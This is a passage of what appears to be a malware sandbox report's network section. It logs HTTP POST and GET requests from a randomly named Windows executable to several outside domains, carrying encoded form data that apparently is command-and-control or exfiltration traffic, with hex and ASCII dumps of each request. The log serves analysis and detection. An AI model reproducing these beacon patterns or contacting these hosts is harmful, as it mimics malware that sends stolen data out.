                                                                                                                  26192.168.2.550002101.35.209.18380728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:25:30.773058891 CET782OUTPOST /31pt/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Connection: close
                                                                                                                  Host: www.yc791022.asia
                                                                                                                  Origin: http://www.yc791022.asia
                                                                                                                  Referer: http://www.yc791022.asia/31pt/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 63 31 2b 4f 67 38 7a 4e 6c 43 67 2b 54 70 54 44 52 4e 4d 31 36 39 37 72 7a 44 41 55 59 37 72 58 4f 55 47 4a 65 53 55 4b 75 36 55 30 38 30 72 42 59 6b 51 76 63 63 6c 64 36 73 44 46 76 6e 37 30 4b 50 64 49 37 49 38 6a 38 39 31 48 4c 78 55 74 66 4f 4e 36 33 4a 67 58 36 61 66 44 5a 49 58 69 76 54 75 6a 73 50 72 75 66 2b 78 33 78 66 59 52 5a 4e 41 4a 48 4a 6b 64 4f 47 4e 68 32 48 56 78 57 34 69 53 30 72 6b 46 41 43 66 76 2f 6d 73 7a 61 37 77 70 54 32 47 70 53 68 49 71 63 4e 78 37 31 45 2b 61 66 6d 4c 52 66 69 53 4c 68 4a 48 67 69 74
                                                                                                                  Data Ascii: bV=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafc1+Og8zNlCg+TpTDRNM1697rzDAUY7rXOUGJeSUKu6U080rBYkQvccld6sDFvn70KPdI7I8j891HLxUtfON63JgX6afDZIXivTujsPruf+x3xfYRZNAJHJkdOGNh2HVxW4iS0rkFACfv/msza7wpT2GpShIqcNx71E+afmLRfiSLhJHgit
                                                                                                                  Dec 2, 2024 15:25:32.335412979 CET427INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 02 Dec 2024 14:25:32 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 263
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  27192.168.2.550003101.35.209.18380728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:25:33.440824032 CET1799OUTPOST /31pt/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Connection: close
                                                                                                                  Host: www.yc791022.asia
                                                                                                                  Origin: http://www.yc791022.asia
                                                                                                                  Referer: http://www.yc791022.asia/31pt/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 6b 31 2b 59 55 38 79 71 35 43 68 2b 54 70 4e 7a 52 4d 4d 31 36 73 37 72 36 4b 41 55 56 45 72 56 32 55 48 72 57 53 63 66 43 36 66 30 38 30 7a 78 59 77 55 76 63 7a 6c 64 71 77 44 46 2f 6e 37 30 4b 50 64 4a 4c 49 38 33 6f 39 33 48 4c 77 58 74 66 53 4a 36 33 78 67 58 79 77 66 44 56 2b 58 52 6e 54 75 44 38 50 34 73 33 2b 73 6e 78 64 62 52 5a 46 41 4a 43 58 6b 5a 57 73 4e 68 44 71 56 7a 32 34 30 7a 55 39 6d 31 38 6f 64 75 58 4a 6e 68 2b 75 77 70 66 59 50 2f 43 41 53 35 6c 74 31 6f 70 32 78 75 6e 6c 42 69 61 77 4e 76 38 65 48 56 79 74 49 75 46 76 69 74 4b 4b 44 35 50 4f 2f 7a 7a 6c 62 57 74 62 64 49 76 74 62 59 75 43 4e 57 38 75 54 59 32 63 54 62 6f 57 6f 6c 73 73 71 79 76 36 42 58 39 6a 55 75 68 6b 4d 75 62 74 67 6f 37 4e 66 75 74 75 65 38 55 77 77 4b 42 6b 76 6c 6f 6e 6e 77 65 2b 76 75 4c 51 34 69 42 30 65 37 4f 70 6c 33 4b 51 39 6b 37 51 33 61 69 76 63 49 55 53 54 35 50 [TRUNCATED]
                                                                                                                  Data Ascii: bV=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafk1+YU8yq5Ch+TpNzRMM16s7r6KAUVErV2UHrWScfC6f080zxYwUvczldqwDF/n70KPdJLI83o93HLwXtfSJ63xgXywfDV+XRnTuD8P4s3+snxdbRZFAJCXkZWsNhDqVz240zU9m18oduXJnh+uwpfYP/CAS5lt1op2xunlBiawNv8eHVytIuFvitKKD5PO/zzlbWtbdIvtbYuCNW8uTY2cTboWolssqyv6BX9jUuhkMubtgo7Nfutue8UwwKBkvlonnwe+vuLQ4iB0e7Opl3KQ9k7Q3aivcIUST5P8AlNAKD9QgVARGyuHvKKrIgQ6vLbONSGj6rHynUJcOCtGUhD7U+FO/lyd+kMiPeCJ8WdbBHBNxHh3rEvgBXi2k4XTlE0kZy0yQdZBpzBkimWVqY74T9nsDsPkbZhjkQISRSgxqfa0RcOIgG1FGoKopb0DAdicwLsMo/OWsO6vmYYC9gyw9xXv/FzHNKdyBLSgFyOZQgzkQmzaADJr/5UiA4e5xJvqD+3/GbowY4E6S4oYKFk70PVKR2YFIAIfgnCqf+MaTV6eD3yh2hjiaYGaQZ/lCgNlyqVf4VQ8iRCixdu9a110Vfk9hId1hx1nFfhxLUMXNWJb7n/fPgDQtiVabTJMh1QqlJZBsGFw//JA0MocQz6GXWUaT/hsIVgKuN3MvxQjuzsxWtphYqGgYC9MqjxFud9qqFb4cH7SOLcMlcNhQQCL1xQQVh8pJ4lOIOm6+FVpHVMAn8/vRVrdOKAfpsxTVngQ4xoD7k8/zp+8kW6XUxI4ESy3N5jYaP9vWJfq1bOrchE9/+I4yAMJJca4Vhx+DAdGruknc1QuQZdTh/FGf0hzQzSma40jZDsKaY9uErjfdvaHX38aaaHC2aASqkBDHDSizI+ZT4Iyqa4sCsrdk3Nr0V1mZJEfz9CRRTcup/NnvWH+/CfhLu1Vd/IHlsQrdfx19WJyY [TRUNCATED]


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  28192.168.2.550004101.35.209.18380728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:25:36.112504959 CET498OUTGET /31pt/?bV=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0tkqytLQfQBhcOdFFeEx3iaXLjcxC54/kiaY/bAFrqB8g==&wzcP=iLdd HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Connection: close
                                                                                                                  Host: www.yc791022.asia
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Dec 2, 2024 15:25:37.654850960 CET427INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 02 Dec 2024 14:25:37 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 263
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  29192.168.2.55000538.47.232.20280728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:25:43.352871895 CET750OUTPOST /p3j6/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Connection: close
                                                                                                                  Host: www.43kdd.top
                                                                                                                  Origin: http://www.43kdd.top
                                                                                                                  Referer: http://www.43kdd.top/p3j6/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 32 32 64 54 45 62 59 49 73 5a 48 6e 75 79 6b 64 4b 72 34 55 6c 42 61 55 39 79 4c 68 54 6a 71 35 63 6f 7a 71 33 76 45 2f 32 56 4c 53 57 65 4f 33 4f 4e 37 62 36 7a 78 49 49 6e 75 58 78 66 41 36 65 41 58 2f 6d 48 49 41 57 7a 41 52 6a 4f 37 36 74 34 33 75 49 59 6e 43 4d 52 52 36 43 50 51 30 6b 6e 4a 72 49 47 4d 71 4b 61 6f 5a 53 63 39 62 79 52 57 65 71 49 71 2b 6a 76 57 78 4e 79 6b 67 67 51 6e 64 6d 78 57 38 32 44 49 53 4c 59 32 74 36 54 41 36 34 57 2b 50 75 67 58 50 48 30 41 77 44 68 4d 4d 65 6c 71 6b 58 73 57 64 4d 42 2b 4a 61 59 6f 79 58 69 67 66 73 73 3d
                                                                                                                  Data Ascii: bV=DX5WBz7Pi8kdj22dTEbYIsZHnuykdKr4UlBaU9yLhTjq5cozq3vE/2VLSWeO3ON7b6zxIInuXxfA6eAX/mHIAWzARjO76t43uIYnCMRR6CPQ0knJrIGMqKaoZSc9byRWeqIq+jvWxNykggQndmxW82DISLY2t6TA64W+PugXPH0AwDhMMelqkXsWdMB+JaYoyXigfss=
                                                                                                                  Dec 2, 2024 15:25:44.873356104 CET312INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 02 Dec 2024 14:25:44 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 148
                                                                                                                  Connection: close
                                                                                                                  ETag: "66df9b06-94"
                                                                                                                  Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  30192.168.2.55000638.47.232.20280728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:25:46.024542093 CET770OUTPOST /p3j6/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Connection: close
                                                                                                                  Host: www.43kdd.top
                                                                                                                  Origin: http://www.43kdd.top
                                                                                                                  Referer: http://www.43kdd.top/p3j6/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 33 71 35 38 59 7a 6c 57 76 45 36 32 56 4c 64 47 65 4c 36 75 4e 4b 62 36 75 4f 49 4c 2f 75 58 78 4c 41 36 66 77 58 38 56 76 4c 42 47 7a 65 61 44 4f 6c 6e 64 34 33 75 49 59 6e 43 4d 30 36 36 43 58 51 31 51 6a 4a 35 35 47 50 6e 71 61 72 51 79 63 39 4d 69 52 53 65 71 4a 4e 2b 69 79 65 78 4f 61 6b 67 69 49 6e 64 54 4e 56 7a 32 44 4b 57 4c 59 70 6a 34 57 7a 6a 2b 61 6f 56 50 39 77 59 58 34 4e 34 56 51 6d 57 38 74 43 33 33 41 75 4e 66 4a 4a 59 71 35 42 6f 30 79 51 42 37 37 71 74 79 65 2b 42 65 41 69 58 45 32 6e 39 57 67 2b 59 62 75 49
                                                                                                                  Data Ascii: bV=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4Klhh3q58YzlWvE62VLdGeL6uNKb6uOIL/uXxLA6fwX8VvLBGzeaDOlnd43uIYnCM066CXQ1QjJ55GPnqarQyc9MiRSeqJN+iyexOakgiIndTNVz2DKWLYpj4Wzj+aoVP9wYX4N4VQmW8tC33AuNfJJYq5Bo0yQB77qtye+BeAiXE2n9Wg+YbuI
                                                                                                                  Dec 2, 2024 15:25:47.656086922 CET312INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 02 Dec 2024 14:25:47 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 148
                                                                                                                  Connection: close
                                                                                                                  ETag: "66df9b06-94"
                                                                                                                  Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  31192.168.2.55000738.47.232.20280728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:25:48.694571018 CET1787OUTPOST /p3j6/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Connection: close
                                                                                                                  Host: www.43kdd.top
                                                                                                                  Origin: http://www.43kdd.top
                                                                                                                  Referer: http://www.43kdd.top/p3j6/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 50 71 35 76 51 7a 6b 31 33 45 39 32 56 4c 65 47 65 4b 36 75 4e 54 62 36 32 43 49 4d 33 55 58 7a 7a 41 37 38 6f 58 33 45 76 4c 50 47 7a 65 56 6a 4f 34 36 74 34 69 75 4a 6f 38 43 4d 45 36 36 43 58 51 31 57 50 4a 37 6f 47 50 30 61 61 6f 5a 53 63 4c 62 79 52 32 65 72 74 33 2b 69 47 4f 77 2b 36 6b 67 43 59 6e 4f 52 6c 56 73 47 44 45 62 72 5a 38 6a 35 71 73 6a 34 2b 6b 56 50 49 56 59 55 59 4e 70 6a 74 4b 47 39 45 55 6a 30 59 57 47 59 4a 7a 47 65 6c 76 6c 55 79 45 44 4a 62 37 78 52 61 44 4c 50 51 30 66 47 58 35 70 54 6b 71 66 62 2f 43 4a 4f 45 37 64 46 44 67 42 6f 51 67 61 79 57 31 79 79 2f 7a 62 73 58 55 6b 50 6c 59 51 5a 59 39 36 7a 4d 32 65 79 6d 7a 45 42 7a 35 50 30 55 52 42 75 43 5a 63 2f 4a 55 4c 56 72 2b 43 6a 75 37 4a 49 68 37 54 42 53 39 4d 34 6f 30 6f 4f 67 54 34 5a 51 63 2f 7a 46 39 6d 74 55 6b 2b 41 30 59 47 75 57 47 59 41 6d 70 2b 55 49 73 6d 6b 36 6c 61 4d 47 [TRUNCATED]
                                                                                                                  Data Ascii: bV=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4KlhhPq5vQzk13E92VLeGeK6uNTb62CIM3UXzzA78oX3EvLPGzeVjO46t4iuJo8CME66CXQ1WPJ7oGP0aaoZScLbyR2ert3+iGOw+6kgCYnORlVsGDEbrZ8j5qsj4+kVPIVYUYNpjtKG9EUj0YWGYJzGelvlUyEDJb7xRaDLPQ0fGX5pTkqfb/CJOE7dFDgBoQgayW1yy/zbsXUkPlYQZY96zM2eymzEBz5P0URBuCZc/JULVr+Cju7JIh7TBS9M4o0oOgT4ZQc/zF9mtUk+A0YGuWGYAmp+UIsmk6laMGPGYkNPq2PeHdontkMW0+rrfpIcAn7g85JzibReKR68XcUaY3ctPPEnufkhi4+s+tcMUFuGtrA54jdJ4Ytsarn6Ik3JEDeZTUkApCs8eKjCKprSXA1ZzXWzgHYIBk0HQcqa1+RM4HxQmevrf2NH3z+O9UbBrJeTVuRzuaElpEB9T/O1VB9yC3EfwPkx5UjokIkrFwjw29Es3DlG94H6XmwaeiVFrJgHzHABAmyRk3Aov5GStlPRti3qOMDYioTBkuEXF/l4BflChrEAuDonzfHnPd9Axi7UWzWCjugPhYo1Ep7NgCy98RI1ds9zWW0uxATuKDgn7pPRx7axqh8EeaNiOsnrTlu46Lx+eyl7Ut0JjCo+PItfQbhkFa1X08n/hmnwdBsv9YK/cLw7EQjlbsKHxwsLVdJ1F3wVC+ipyauNWBeFQWmSIEX4vD9TXzZeKxV3gDmaRvsHuaORkACwyMMMVFR3AyaiOMdPTMxykcIXQssUbF6FUsr+EzCweRoXQFPFyppDtg3KM55GhRcYKjTJeAfe4tOUJGTv+8B0IAwe8axtqGzPzKgU2lGY8AglT74CiAWnt+Ki9RDBEFj732iKbOelz6TOZy0DUgh7biCnbM7XXCtsz1pnZiAHtfguLIzpx0gAmElyw/EBt6V8zbGNQ1kWMqCUXChh [TRUNCATED]


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  32192.168.2.55000838.47.232.20280728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:25:51.355058908 CET494OUTGET /p3j6/?bV=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPKWG5WAS3psYmnqJIK+9TxAzVw33X+qLRjr2nQR0/ahQ8dw==&wzcP=iLdd HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Connection: close
                                                                                                                  Host: www.43kdd.top
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Dec 2, 2024 15:25:53.002049923 CET312INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 02 Dec 2024 14:25:52 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 148
                                                                                                                  Connection: close
                                                                                                                  ETag: "66df9b06-94"
                                                                                                                  Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  33192.168.2.550009208.91.197.3980728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:25:59.039925098 CET750OUTPOST /hxi5/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Connection: close
                                                                                                                  Host: www.jcsa.info
                                                                                                                  Origin: http://www.jcsa.info
                                                                                                                  Referer: http://www.jcsa.info/hxi5/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 74 6c 78 6b 34 30 52 66 2b 63 6b 4d 77 64 69 76 59 61 35 6a 77 55 48 70 6e 73 4b 33 52 53 62 72 37 64 46 74 74 47 69 37 65 70 36 44 58 6d 6b 37 4c 6b 5a 6a 6e 33 4c 55 70 49 58 69 52 41 38 4f 33 6b 6e 4e 31 65 53 42 66 78 78 6b 2f 34 2b 4f 41 64 75 56 6d 6e 59 73 33 52 7a 65 7a 6f 33 4a 67 46 61 39 57 74 75 6a 56 4d 78 6d 4c 56 73 63 2f 59 58 44 64 2f 57 55 50 41 44 6a 32 6a 47 76 30 6d 72 37 4d 6f 30 42 59 58 6d 2b 54 72 69 2b 61 4a 36 54 33 41 65 44 4e 65 57 6e 67 2b 5a 47 6f 7a 31 52 57 4a 45 48 35 43 30 48 59 6c 6a 4d 43 33 6a 45 34 46 4f 47 6e 73 3d
                                                                                                                  Data Ascii: bV=yzleTXLhZhPoxtlxk40Rf+ckMwdivYa5jwUHpnsK3RSbr7dFttGi7ep6DXmk7LkZjn3LUpIXiRA8O3knN1eSBfxxk/4+OAduVmnYs3Rzezo3JgFa9WtujVMxmLVsc/YXDd/WUPADj2jGv0mr7Mo0BYXm+Tri+aJ6T3AeDNeWng+ZGoz1RWJEH5C0HYljMC3jE4FOGns=


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  34192.168.2.550010208.91.197.3980728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
